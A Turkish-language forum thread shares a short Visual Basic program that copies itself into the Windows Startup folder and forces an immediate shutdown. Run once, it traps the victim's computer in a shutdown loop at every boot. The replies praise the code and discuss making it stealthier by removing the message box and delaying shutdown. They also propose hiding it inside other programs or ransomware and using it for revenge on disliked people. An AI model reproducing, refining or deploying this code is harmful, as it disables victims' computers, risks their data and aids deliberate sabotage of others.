Private Sub Form_Load()
FileCopy App.Path & “” & App.EXEName & “.exe”, “C:********s and SettingsAll UsersStart MenuProgramlarBaşlangıç” & App.EXEName & “.exe”
MsgBox “Lol xd”, vbInformation, “Kendine cicci baak :dd”
Shell (“shutdown -s -t 1″)
End Sub
Gerek var mı? Yok lulshutdown -s -t 1
1 sayısı bilgisayarın ne zaman kapatılacağının saniyesidir 20 yaparsak 20 saniye sonra kapanır insanlar bilgilensin
yararlı
TeşekkürlerKanka Güzel Kodmuş
You're welcome bra.
Güvenli modda program tabiki kapanıyor güvenli modda sadece "Windows" uygulamaları çalışıyor maalesef.O zaman dans , acayip iyi kodmuş peki güvenli modda açılsa yine kapanırmı ?
Kod çok güzel fakat msg box lar program açıldığı andan itibaren açılıp bilgisayar o andan itibaren kapanmaya başlayacağı için kişi virüs yediğini anlayabilir ve akıllıysa güvenli mod ile bilgisayardaki verileri kurtarabilir benim önerim msg box ların kullanılmaması ve bilgisayarın yaklaşık 2 dakika sonra kapanmasıdırGüvenli modda program tabiki kapanıyor güvenli modda sadece "Windows" uygulamaları çalışıyor maalesef.
Mantıken bunu akıllı birine yapamazsın zaten, timing 1 saniye olduğu için o verileri zarar görecektir bunu bir fidye virüsüne ekleyebilir ya da konuda belirttiğim gibi editleyerek atabilirsin.Kod çok güzel fakat msg box lar program açıldığı andan itibaren açılıp bilgisayar o andan itibaren kapanmaya başlayacağı için kişi virüs yediğini anlayabilir ve akıllıysa güvenli mod ile bilgisayardaki verileri kurtarabilir benim önerim msg box ların kullanılmaması ve bilgisayarın yaklaşık 2 dakika sonra kapanmasıdır
TeşekkürlerVirtual Server'da denersek sorun çıkarmayacaktır. Çok merak edenler Bir sanal sunucu oluşturup deneyebilir. Güzel konu, ellerine sağlık.
Mantıklı <3Mantıken bunu akıllı birine yapamazsın zaten, time 1 saniye olduğu için o verileri zarar görecektir bunu bir fidye virüsüne ekleyebilir ya da konuda belirttiğim gibi editleyerek atabilirsin.
Yani masum değil de nefret ettiğiniz kişilere kullanın derim.Çok Yararlı Bir Konu, Bu Kodu Bilmeyenler İçin Sıkıntı Var Demektir
Evet, Mesela İntikam Gibi Hele Burda İntikam Kokusu Çok Fazla Var Çoğu Kişi Elimine Edilecekmiş Gibime Geliyor Sizde Alıyormusunuz?Yani masum değil de nefret ettiğiniz kişilere kullanın derim.
Dediğim gibi olacaklardan ben sorumlu değilim, eğer gerçekten hak yenmişse ceza olarak bu uygulanabilir çünkü bu şaka virüsünün de ötesinde bir şey.Evet, Mesela İntikam Gibi Hele Burda İntikam Kokusu Çok Fazla Var Çoğu Kişi Elimine Edilecekmiş Gibime Geliyor Sizde Alıyormusunuz?
Bunun Ne Olduğunu Biliyorum,Daha Öncede Biliyordum BirÇok Yazılım Dili Biliyorum Ve Cr4ck İcraat'ım Olmuştur. Ve Çoğu Reserve Türünü Yani Olacaklardan Sizi Sorumlu Tutmuyorum. Böyle İntikam Doğuran Bir Ortamda Bu Kod'u Yememek İmkansız. Farklı Programlar İle HattaDediğim gibi olacaklardan ben sorumlu değilim, eğer gerçekten hak yenmişse ceza olarak bu uygulanabilir çünkü bu şaka virüsünün de ötesinde bir şey.
Evet anlaşılır ama programın ne olup olmadığına bakmayan bir sürü insan var@Bleedat Global program da kullansa dahi programın içine gömülmesi gerekir ki decompile edilğinde bu kod anlaşılır zaten.
Post automatically merged:
Teşekkürler
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?